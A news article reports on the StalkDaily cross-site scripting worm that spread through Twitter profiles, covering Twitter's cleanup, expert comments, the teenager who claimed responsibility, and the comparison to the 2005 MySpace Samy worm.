Twitter worm underscores social-networking vulnerabilities
Twitter was struck by a particularly nasty cross-site scripting worm over the weekend, again bringing to light the threat of client-side attacks across social networking sites.
The Twitter worm spread links to a supposed Twitter copycat site called StalkDaily[dot]com by exploiting a cross-site scripting (XSS) vulnerability and infecting an unknown number of Twitter profiles. Each wave of the worm attacks was more intense than its predecessor, according to a post on the official Twitter blog.
“We secured the accounts that had been compromised and removed any content that might help spread the worm,” Twitter co-founder Biz Stone wrote on the blog. “All told, we identified and deleted almost 10,000 'tweets' [messages] that could have continued to spread the worm.”
The worm's activity seems to have been contained, but there is little guarantee that no threats remain, experts said.
“This may be an open-ended problem," Andy Hayter, Anti-Malcode program manager at security solutions tester ICSA Labs, told SCMagazineUS.com on Monday. "I don't think we've seen the end of it."
But overall, the damage so far has been minimal, Stone said in his blog post. No personal information was compromised.
Richard Wang, manager of Sophos Labs U.S., recommended Twitter users avoid clicking on untrusted links. He also told SCMagazineUS.com that Twitter can modify its platform so it cannot support malicious code such as this.Stone wrote: “We are still reviewing all the details, cleaning up, and we remain on alert.”
According to published reports, a 17-year-old Brooklyn, N.Y. boy has taken responsibility for the attack. Michael "Mikeyy" Mooney said he devised the malware out of boredom and to prove how vulnerable Twitter is.
Stone likened the attack to one perpetrated by Samy Kamkar, who, in 2005 when he was 19, unleashed a similar self-replicating, XSS worm across MySpace that was believed to be the first of its kind. The worm was benign but enabled Kamkar to attain more than one million "friends" in 24 hours. He later was sentenced to three years probation and ordered to serve 90 days of community service.